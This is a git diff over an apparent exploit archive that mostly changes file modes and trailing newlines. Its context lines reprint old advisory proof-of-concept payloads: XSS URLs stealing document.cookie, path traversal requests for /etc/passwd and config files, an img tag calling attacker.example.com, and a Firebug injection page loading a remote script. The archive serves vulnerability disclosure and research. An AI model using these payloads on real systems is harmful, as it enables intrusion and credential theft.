--git a/platforms/multiple/remote/24246.txt b/platforms/multiple/remote/24246.txt old mode 100755 new mode 100644 index 22042e186..119dbdcd9 --- a/platforms/multiple/remote/24246.txt +++ b/platforms/multiple/remote/24246.txt @@ -6,4 +6,4 @@ The web server component of SCI Chat server will display an error message when i A remote attacker can exploit this issue by creating a malicious link to the vulnerable application that includes hostile HTML and script code. If this link were followed by an unsuspecting user, the hostile code may be rendered in the their web browser. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com:1235/<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com:1235/<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/multiple/remote/24253.txt b/platforms/multiple/remote/24253.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24264.java b/platforms/multiple/remote/24264.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24268.txt b/platforms/multiple/remote/24268.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24325.html b/platforms/multiple/remote/24325.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24376.txt b/platforms/multiple/remote/24376.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24387.txt b/platforms/multiple/remote/24387.txt old mode 100755 new mode 100644 index 497aecda0..9a3ee02f4 --- a/platforms/multiple/remote/24387.txt +++ b/platforms/multiple/remote/24387.txt @@ -12,4 +12,4 @@ Connection: close Accept: text/plain Accept-Language: en-us,en Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -User-Agent: Some-Fake-UA <img src='http://attacker.example.com/app.gif'> \ No newline at end of file +User-Agent: Some-Fake-UA <img src='http://attacker.example.com/app.gif'> \ No newline at end of file diff --git a/platforms/multiple/remote/24414.txt b/platforms/multiple/remote/24414.txt old mode 100755 new mode 100644 index 7d05c0846..5f4c2790c --- a/platforms/multiple/remote/24414.txt +++ b/platforms/multiple/remote/24414.txt @@ -9,4 +9,4 @@ This vulnerability will allow a remote attacker to retrieve potentially sensitiv Version 1.0.2 of the software is reported vulnerable to this issue. Other versions may also be affected. http://www.example.com/%2E%2E%5Csystem.log -http://www.example.com/%2E%2E\system.log \ No newline at end of file +http://www.example.com/%2E%2E\system.log \ No newline at end of file diff --git a/platforms/multiple/remote/24567.txt b/platforms/multiple/remote/24567.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24581.txt b/platforms/multiple/remote/24581.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24598.txt b/platforms/multiple/remote/24598.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24654.txt b/platforms/multiple/remote/24654.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24701.txt b/platforms/multiple/remote/24701.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24707.txt b/platforms/multiple/remote/24707.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24713.txt b/platforms/multiple/remote/24713.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24724.c b/platforms/multiple/remote/24724.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24725.php b/platforms/multiple/remote/24725.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24730.txt b/platforms/multiple/remote/24730.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24774.java b/platforms/multiple/remote/24774.java old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24979.txt b/platforms/multiple/remote/24979.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24980.txt b/platforms/multiple/remote/24980.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24981.txt b/platforms/multiple/remote/24981.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24982.txt b/platforms/multiple/remote/24982.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24983.txt b/platforms/multiple/remote/24983.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24984.txt b/platforms/multiple/remote/24984.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/24995.txt b/platforms/multiple/remote/24995.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25011.txt b/platforms/multiple/remote/25011.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25018.txt b/platforms/multiple/remote/25018.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25019.txt b/platforms/multiple/remote/25019.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25028.txt b/platforms/multiple/remote/25028.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25066.txt b/platforms/multiple/remote/25066.txt old mode 100755 new mode 100644 index d7d04cc6b..495770440 --- a/platforms/multiple/remote/25066.txt +++ b/platforms/multiple/remote/25066.txt @@ -12,4 +12,4 @@ netcat -L -p 99 -s 127.0.0.1 < hallo.txt 2) Connect to the WebWasher proxy port (default 8080/tcp) 3) Enter command "CONNECT 127.0.0.1:99 HTTP/1.0" -As a result, content of hallo.txt will appear. \ No newline at end of file +As a result, content of hallo.txt will appear. \ No newline at end of file diff --git a/platforms/multiple/remote/25072.txt b/platforms/multiple/remote/25072.txt old mode 100755 new mode 100644 index f75e686e9..f41340a3d --- a/platforms/multiple/remote/25072.txt +++ b/platforms/multiple/remote/25072.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to gain access to sensitive information incl [path to CitrusDB]/io/newfile.txt -where [path to CitrusDB] is the path relative to the web root. \ No newline at end of file +where [path to CitrusDB] is the path relative to the web root. \ No newline at end of file diff --git a/platforms/multiple/remote/25079.txt b/platforms/multiple/remote/25079.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25091.txt b/platforms/multiple/remote/25091.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25132.txt b/platforms/multiple/remote/25132.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25133.txt b/platforms/multiple/remote/25133.txt old mode 100755 new mode 100644 index a19450758..2d4163a7d --- a/platforms/multiple/remote/25133.txt +++ b/platforms/multiple/remote/25133.txt @@ -5,4 +5,4 @@ A vulnerability has been identified in the handling of certain types of requests Read privileges granted to these files would be restricted by the permissions of the web server process. http://www.example.com/../../../file -http://www.example.com/..\..\..\file \ No newline at end of file +http://www.example.com/..\..\..\file \ No newline at end of file diff --git a/platforms/multiple/remote/25190.txt b/platforms/multiple/remote/25190.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25191.txt b/platforms/multiple/remote/25191.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25205.txt b/platforms/multiple/remote/25205.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25210.php b/platforms/multiple/remote/25210.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25211.c b/platforms/multiple/remote/25211.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25238.txt b/platforms/multiple/remote/25238.txt old mode 100755 new mode 100644 index 28493f49d..81db098da --- a/platforms/multiple/remote/25238.txt +++ b/platforms/multiple/remote/25238.txt @@ -17,4 +17,4 @@ These vulnerabilities are reported to affect Icecast version 2.20, other version <xsl:value-of select="<lots of chars>" /> GET /auth.xsl. HTTP/1.0 -GET /status.xsl. HTTP/1.0 \ No newline at end of file +GET /status.xsl. HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/25291.txt b/platforms/multiple/remote/25291.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25391.txt b/platforms/multiple/remote/25391.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25395.txt b/platforms/multiple/remote/25395.txt old mode 100755 new mode 100644 index 9fb4b17fc..e11497ff6 --- a/platforms/multiple/remote/25395.txt +++ b/platforms/multiple/remote/25395.txt @@ -4,4 +4,4 @@ Sun JavaMail is prone to a directory traversal vulnerability. This arises becaus This issue was reported to affect JavaMail 1.3.2, however, earlier versions may also be vulnerable. -Content-Disposition: ../../../file.ext \ No newline at end of file +Content-Disposition: ../../../file.ext \ No newline at end of file diff --git a/platforms/multiple/remote/25396.txt b/platforms/multiple/remote/25396.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25397.txt b/platforms/multiple/remote/25397.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25420.txt b/platforms/multiple/remote/25420.txt old mode 100755 new mode 100644 index e474d658e..dcbc67768 --- a/platforms/multiple/remote/25420.txt +++ b/platforms/multiple/remote/25420.txt @@ -7,4 +7,4 @@ It should be noted that this issue only arises when the Web serve and applicatio An attacker may leverage this issue to disclose JSP source code, facilitating code theft as well as potential further attacks. GET /index.jsp HTTP/1.0 -Host: NonExistentHost \ No newline at end of file +Host: NonExistentHost \ No newline at end of file diff --git a/platforms/multiple/remote/25559.txt b/platforms/multiple/remote/25559.txt old mode 100755 new mode 100644 index c55a6a4d0..6f15c6140 --- a/platforms/multiple/remote/25559.txt +++ b/platforms/multiple/remote/25559.txt @@ -14,4 +14,4 @@ http://example.com:7778/dms0 The following URLs are protected: http://example.com:7779/dmsoc4j/AggreSpy?format=metrictable&nountype=ohs_child&orderby=Name http://example.com:7779/server-status -http://example.com:7779/dms0 \ No newline at end of file +http://example.com:7779/dms0 \ No newline at end of file diff --git a/platforms/multiple/remote/25561.txt b/platforms/multiple/remote/25561.txt old mode 100755 new mode 100644 index 8f4cf0a43..226880509 --- a/platforms/multiple/remote/25561.txt +++ b/platforms/multiple/remote/25561.txt @@ -6,4 +6,4 @@ The issue exists becaue dangerous characters are not removed from a certain para If this URI is followed by a user with sufficient privileges, garbage data is appended to the end of the specified file. -http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf \ No newline at end of file +http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf \ No newline at end of file diff --git a/platforms/multiple/remote/25562.txt b/platforms/multiple/remote/25562.txt old mode 100755 new mode 100644 index 92b2f45cd..0d7ec2c08 --- a/platforms/multiple/remote/25562.txt +++ b/platforms/multiple/remote/25562.txt @@ -5,4 +5,4 @@ A remote cross-site scripting vulnerability affects the Oracle Application Serve The issue affects the 'cache_dump_file' parameter of the 'webcacheadmin' script. http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_replace_file.txt<script>alert(document.cookie);</script> -http://administrator:administrator@example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script> \ No newline at end of file +http://administrator:administrator@example.com:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&index=1&cache_dump_file=/tmp/create_or_append_file.txt<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/multiple/remote/25563.txt b/platforms/multiple/remote/25563.txt old mode 100755 new mode 100644 index f49a20ce0..b565766c0 --- a/platforms/multiple/remote/25563.txt +++ b/platforms/multiple/remote/25563.txt @@ -4,4 +4,4 @@ A remote cross-site scripting vulnerability affects the Oracle Application Serve The issue affects the 'PartialPageErrorPage' parameter of the 'webcacheadmin' script. -http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2 \ No newline at end of file +http://example.com:4000/webcacheadmin?SCREEN_ID=CGA.Site.ApologyPages_Edit&ACTION=Submit&PartialPageErrorPage=/inservice.html<script>alert(document.cookie)</script>&site_id=2 \ No newline at end of file diff --git a/platforms/multiple/remote/25574.txt b/platforms/multiple/remote/25574.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25613.txt b/platforms/multiple/remote/25613.txt old mode 100755 new mode 100644 index 406b823cc..4dc524902 --- a/platforms/multiple/remote/25613.txt +++ b/platforms/multiple/remote/25613.txt @@ -41,4 +41,4 @@ from sys.dba_fga_audit_trail; --> It will return 1 row which was obtained by step 2. -A new row was not inserted again. \ No newline at end of file +A new row was not inserted again. \ No newline at end of file diff --git a/platforms/multiple/remote/25670.html b/platforms/multiple/remote/25670.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25691.txt b/platforms/multiple/remote/25691.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25708.txt b/platforms/multiple/remote/25708.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25710.txt b/platforms/multiple/remote/25710.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25842.txt b/platforms/multiple/remote/25842.txt old mode 100755 new mode 100644 index 0f4e7c4f8..631c1fdaf --- a/platforms/multiple/remote/25842.txt +++ b/platforms/multiple/remote/25842.txt @@ -17,4 +17,4 @@ Content-Type: text/html Example 2 (Config file download): [4.0.2] Request: >>telnet [jbosshost] 8083 ->>GET %server.policy HTTP/1.0 \ No newline at end of file +>>GET %server.policy HTTP/1.0 \ No newline at end of file diff --git a/platforms/multiple/remote/25944.txt b/platforms/multiple/remote/25944.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/25988.txt b/platforms/multiple/remote/25988.txt old mode 100755 new mode 100644 index 619ee8e70..dc22922b2 --- a/platforms/multiple/remote/25988.txt +++ b/platforms/multiple/remote/25988.txt @@ -5,4 +5,4 @@ The mod_oradav module for Oracle HTTP Server included in Oracle9i Application Se This issue was mentioned in the patch readme for the Oracle Critical Patch Update for July. This issue was also addressed by Oracle Security Alert #52, dated Feb 13, 2003. http://www.example.com/dav_public -http://www.example.com/dav_portal \ No newline at end of file +http://www.example.com/dav_portal \ No newline at end of file diff --git a/platforms/multiple/remote/26002.txt b/platforms/multiple/remote/26002.txt old mode 100755 new mode 100644 index 4185a0c80..ee66d59b7 --- a/platforms/multiple/remote/26002.txt +++ b/platforms/multiple/remote/26002.txt @@ -8,4 +8,4 @@ All versions of Oracle Reports Server are reported to be vulnerable to this issu http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc ott/tiger@iasdb+destype=cache+desformat=xml+CUSTOMIZE=/opt/ORACLE/ias/oracle/pro -duct/9.0.2/webcache/webcache.xml \ No newline at end of file +duct/9.0.2/webcache/webcache.xml \ No newline at end of file diff --git a/platforms/multiple/remote/26003.txt b/platforms/multiple/remote/26003.txt old mode 100755 new mode 100644 index 919dfb245..f64d2e23c --- a/platforms/multiple/remote/26003.txt +++ b/platforms/multiple/remote/26003.txt @@ -7,4 +7,4 @@ Reportedly, the server fails to restrict users from accessing parts of arbitrary All versions of Oracle Reports Server are reported to be vulnerable to this issue. http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc -ott/tiger@iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd \ No newline at end of file +ott/tiger@iasdb+destype=file+MODE=CHARACTER+desformat=/etc/passwd \ No newline at end of file diff --git a/platforms/multiple/remote/26004.txt b/platforms/multiple/remote/26004.txt old mode 100755 new mode 100644 index aa5a54244..6508bf7be --- a/platforms/multiple/remote/26004.txt +++ b/platforms/multiple/remote/26004.txt @@ -18,4 +18,4 @@ ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER= http://www.example.com:7778/reports/rwservlet?server=myserver+report=test.rdf+userid=sc ott/tiger@iasdb+destype=localFile+desformat=delimited+desname=FILE:+CELLWRAPPER= -<script>alert(document.cookie);</script> \ No newline at end of file +<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/multiple/remote/26006.txt b/platforms/multiple/remote/26006.txt old mode 100755 new mode 100644 index 1bed67baf..6cd7e5c48 --- a/platforms/multiple/remote/26006.txt +++ b/platforms/multiple/remote/26006.txt @@ -8,4 +8,4 @@ Attackers may exploit this vulnerability to execute arbitrary commands, or read/ It should be noted that this issue may be remotely exploited if an attacker has means to write files to the serving computer (WebDAV, FTP, CIFS, etc.) without local access. -http://www.example.com:7779/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF \ No newline at end of file +http://www.example.com:7779/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF \ No newline at end of file diff --git a/platforms/multiple/remote/26013.txt b/platforms/multiple/remote/26013.txt old mode 100755 new mode 100644 index aaf7adabb..5636805b9 --- a/platforms/multiple/remote/26013.txt +++ b/platforms/multiple/remote/26013.txt @@ -7,4 +7,4 @@ Attackers may exploit this vulnerability to execute arbitrary commands with the It should be noted that this issue may be remotely exploited if an attacker has means to write files to the serving computer (WebDAV, FTP, CIFS, etc.) without local access. http://www.example.com:7779/forms90/f90servlet?form=/public/johndoe/hacker.fmx -http://www.example.com:7779/forms90/f90servlet?module=/tmp/hacker.fmx \ No newline at end of file +http://www.example.com:7779/forms90/f90servlet?module=/tmp/hacker.fmx \ No newline at end of file diff --git a/platforms/multiple/remote/26071.txt b/platforms/multiple/remote/26071.txt old mode 100755 new mode 100644 index 7f599b80a..76ea4b8c2 --- a/platforms/multiple/remote/26071.txt +++ b/platforms/multiple/remote/26071.txt @@ -4,4 +4,4 @@ NetworkActiv Web Server is prone to a cross-site scripting vulnerability. This i An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com?">[code] \ No newline at end of file +http://www.example.com?">[code] \ No newline at end of file diff --git a/platforms/multiple/remote/26210.txt b/platforms/multiple/remote/26210.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/26329.txt b/platforms/multiple/remote/26329.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/26330.txt b/platforms/multiple/remote/26330.txt old mode 100755 new mode 100644 index 6e1d4ba2b..37993c846 --- a/platforms/multiple/remote/26330.txt +++ b/platforms/multiple/remote/26330.txt @@ -11,4 +11,4 @@ These issues was originally described and addressed in Oracle Critical Patch Upd http://www.example.com/pls/otn/wwv_flow.accept?p_flow_id=4500&p_flow_step_id=3&p_instance=428576542275032284&p_page_submission_id=3334304&p_request=RUN&p_arg_names= 4407099841&p_t01=KORNBRUST&p_arg_names=998876535505&p_t02=select sysdate||'alert("'||sysdate||'");' from dual%3B&p_arg_names=57198154917561018&p_t03=&p_arg_names=50923815163860037&p_t04=&p_arg_names=64882231271599126&p_t05=&p_arg_names=57064518975385648&p_t06=&p_arg_name -s=57356416829253124&p_t07=&p_arg_names=30322022623394012&p_t08=&p_arg_names=106590927281022368&p_t09=&p_md5_checksum= \ No newline at end of file +s=57356416829253124&p_t07=&p_arg_names=30322022623394012&p_t08=&p_arg_names=106590927281022368&p_t09=&p_md5_checksum= \ No newline at end of file diff --git a/platforms/multiple/remote/26332.txt b/platforms/multiple/remote/26332.txt old mode 100755 new mode 100644 index 82f09c0d0..ed3530713 --- a/platforms/multiple/remote/26332.txt +++ b/platforms/multiple/remote/26332.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue was originally described and addressed in Oracle Critical Patch Update - April 2005, BID 13139 (Oracle Multiple Vulnerabilities). Due to the availability of more information, this issue is being assigned a separate BID. -http://user:host@example.com:8080/oradb<script>alert('Hi')</script> \ No newline at end of file +http://user:host@example.com:8080/oradb<script>alert('Hi')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/26531.html b/platforms/multiple/remote/26531.html old mode 100755 new mode 100644 index 84a8badca..03cb3dda4 --- a/platforms/multiple/remote/26531.html +++ b/platforms/multiple/remote/26531.html @@ -6,4 +6,4 @@ This vulnerability would most likely be exploited through HTML e-mail, though ot <form action="[malicious site]"> <a href="www.example.com"><input type="image" src="[image]" title="www.example.com"></a> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/multiple/remote/26542.txt b/platforms/multiple/remote/26542.txt old mode 100755 new mode 100644 index 3ecc1b65d..f7c7909b0 --- a/platforms/multiple/remote/26542.txt +++ b/platforms/multiple/remote/26542.txt @@ -4,4 +4,4 @@ Struts is prone to a cross-site scripting vulnerability because the application An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/struts-virtdir/<script>alert('test')</script>.do \ No newline at end of file +http://www.example.com/struts-virtdir/<script>alert('test')</script>.do \ No newline at end of file diff --git a/platforms/multiple/remote/26966.txt b/platforms/multiple/remote/26966.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27095.txt b/platforms/multiple/remote/27095.txt old mode 100755 new mode 100644 index 33fc33cd5..b57681c03 --- a/platforms/multiple/remote/27095.txt +++ b/platforms/multiple/remote/27095.txt @@ -4,4 +4,4 @@ Apache Geronimo is prone to multiple input-validation vulnerabilities because th A successful exploit could allow an attacker to compromise the application, access or modify data, or steal cookie-based authentication credentials. The attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. -http://www.example.com/jsp-examples/cal/cal2.jsp?time="/><script>alert('Gotcha')</script> \ No newline at end of file +http://www.example.com/jsp-examples/cal/cal2.jsp?time="/><script>alert('Gotcha')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/27096.txt b/platforms/multiple/remote/27096.txt old mode 100755 new mode 100644 index ac236aca8..a1c743a99 --- a/platforms/multiple/remote/27096.txt +++ b/platforms/multiple/remote/27096.txt @@ -4,4 +4,4 @@ Apache Geronimo is prone to multiple input-validation vulnerabilities because th A successful exploit could allow an attacker to compromise the application, access or modify data, or steal cookie-based authentication credentials. The attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. -http://www.example.com/script-that-dont-has-to-exist.jsp?foobar="/><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/script-that-dont-has-to-exist.jsp?foobar="/><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/multiple/remote/27181.txt b/platforms/multiple/remote/27181.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27182.txt b/platforms/multiple/remote/27182.txt old mode 100755 new mode 100644 index 096bb1315..de61639be --- a/platforms/multiple/remote/27182.txt +++ b/platforms/multiple/remote/27182.txt @@ -6,4 +6,4 @@ These vulnerabilities can allow attackers to carry out a variety of attacks, inc Proof of concept for the email subject field script injection: -</TITLE><SCRIPT>alert("Vulnerable!");</SCRIPT> \ No newline at end of file +</TITLE><SCRIPT>alert("Vulnerable!");</SCRIPT> \ No newline at end of file diff --git a/platforms/multiple/remote/27636.txt b/platforms/multiple/remote/27636.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27637.txt b/platforms/multiple/remote/27637.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27716.txt b/platforms/multiple/remote/27716.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/2784.html b/platforms/multiple/remote/2784.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27887.txt b/platforms/multiple/remote/27887.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/27931.txt b/platforms/multiple/remote/27931.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28209.txt b/platforms/multiple/remote/28209.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28210.txt b/platforms/multiple/remote/28210.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28254.txt b/platforms/multiple/remote/28254.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28312.txt b/platforms/multiple/remote/28312.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28344.txt b/platforms/multiple/remote/28344.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28365.txt b/platforms/multiple/remote/28365.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28368.txt b/platforms/multiple/remote/28368.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/2837.sql b/platforms/multiple/remote/2837.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28501.xml b/platforms/multiple/remote/28501.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28602.txt b/platforms/multiple/remote/28602.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28725.txt b/platforms/multiple/remote/28725.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28981.txt b/platforms/multiple/remote/28981.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/28987.c b/platforms/multiple/remote/28987.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29371.txt b/platforms/multiple/remote/29371.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29439.txt b/platforms/multiple/remote/29439.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29449.html b/platforms/multiple/remote/29449.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29475.txt b/platforms/multiple/remote/29475.txt old mode 100755 new mode 100644 index 4ede0c9d7..3d751f5fd --- a/platforms/multiple/remote/29475.txt +++ b/platforms/multiple/remote/29475.txt @@ -4,4 +4,4 @@ Oracle has released a Critical Patch Update advisory for January 2007 to address The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. -http://www.example.com:1158/em/dynamicImage/emSDK/chart/EmChartBean?beanId=\..\..\..\..\..\..\..\..\..\..\..\..\test.txt \ No newline at end of file +http://www.example.com:1158/em/dynamicImage/emSDK/chart/EmChartBean?beanId=\..\..\..\..\..\..\..\..\..\..\..\..\test.txt \ No newline at end of file diff --git a/platforms/multiple/remote/2951.sql b/platforms/multiple/remote/2951.sql old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29573.xml b/platforms/multiple/remote/29573.xml old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29749.txt b/platforms/multiple/remote/29749.txt old mode 100755 new mode 100644 index 3a850c6e5..7a555de7d --- a/platforms/multiple/remote/29749.txt +++ b/platforms/multiple/remote/29749.txt @@ -4,4 +4,4 @@ Oracle Portal is prone to a cross-site scripting vulnerability because the appli An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl='<script>alert('inT')</script>&p_newurl='<script>alert('ellect')</script> \ No newline at end of file +http://www.example.com/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl='<script>alert('inT')</script>&p_newurl='<script>alert('ellect')</script> \ No newline at end of file diff --git a/platforms/multiple/remote/29820.html b/platforms/multiple/remote/29820.html old mode 100755 new mode 100644 index 9e7e78c83..b24d49f1b --- a/platforms/multiple/remote/29820.html +++ b/platforms/multiple/remote/29820.html @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary script code in the conte Versions prior to 1.04 are vulnerable. -<html> <head> <title>Firebug console HTML injection</title> <style> noscript, .nofirebug{ color: red } </style> </head> <body> <h1>Firebug console HTML injection</h1> <script type="text/javascript"> // A function that returns a specially formatted string function vulnstring(){ return 'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></'+'script>) { }'; } // The function object to log with Firebug var a = function(){}; // Overwrite the default toString method a.toString = vulnstring; // Attempt to trigger the vulnerability if Firebug is installed and has console logging enabled if(typeof console!="undefined" && typeof console.log=="function"){ console.log(a); document.write('<p>Check your Firebug console output. If it says Foo() in very large letters and you get an alert then you are vulnerable and should upgrade to Firebug v1.0.4 or greater.</p>'); } else { // Show error document.write('<p class="nofirebug">This proof of concept exploit requires Firebug to work</p>'); } </script> <noscript><p>This proof of concept exploit requires that Javascript is enabled.</p></noscript> <h3>Cheers, <a href="http://larholm.com/">Thor Larholm</a></h3> </body></html> \ No newline at end of file +<html> <head> <title>Firebug console HTML injection</title> <style> noscript, .nofirebug{ color: red } </style> </head> <body> <h1>Firebug console HTML injection</h1> <script type="text/javascript"> // A function that returns a specially formatted string function vulnstring(){ return 'function <b style="font-size:80px">foo(<script src="http://larholm.com/vuln/firebuginclude.js"></'+'script>) { }'; } // The function object to log with Firebug var a = function(){}; // Overwrite the default toString method a.toString = vulnstring; // Attempt to trigger the vulnerability if Firebug is installed and has console logging enabled if(typeof console!="undefined" && typeof console.log=="function"){ console.log(a); document.write('<p>Check your Firebug console output. If it says Foo() in very large letters and you get an alert then you are vulnerable and should upgrade to Firebug v1.0.4 or greater.</p>'); } else { // Show error document.write('<p class="nofirebug">This proof of concept exploit requires Firebug to work</p>'); } </script> <noscript><p>This proof of concept exploit requires that Javascript is enabled.</p></noscript> <h3>Cheers, <a href="http://larholm.com/">Thor Larholm</a></h3> </body></html> \ No newline at end of file diff --git a/platforms/multiple/remote/29873.php b/platforms/multiple/remote/29873.php old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29884.txt b/platforms/multiple/remote/29884.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/remote/29930.txt b/platforms/multiple/remote/29930.txt old mode 100755 new mode 100644 index d4f737cbf..0795d3133 --- a/platforms/multiple/remote/29930.txt +++ b/platforms/multiple/remote/29930.txt @@ -6,4 +6,4 @@ Information obtained may aid attackers in launching further attacks against an a Apache AXIS 1.0 is vulnerable to this issue. -http://www.example.com/axis/tt_pm4l.jws?wsdl \ No newline at end of file +http://www.example.com/axis/tt_pm4l.jws?wsdl \ No newline at end of file diff --git a/platforms/multiple/remote/29931.txt b/platforms/multiple/remote/29931.txt old mode 100755 new mode 100644 index 056cb485c..00db5f6bc --- a/platforms/multiple/remote/29931.txt 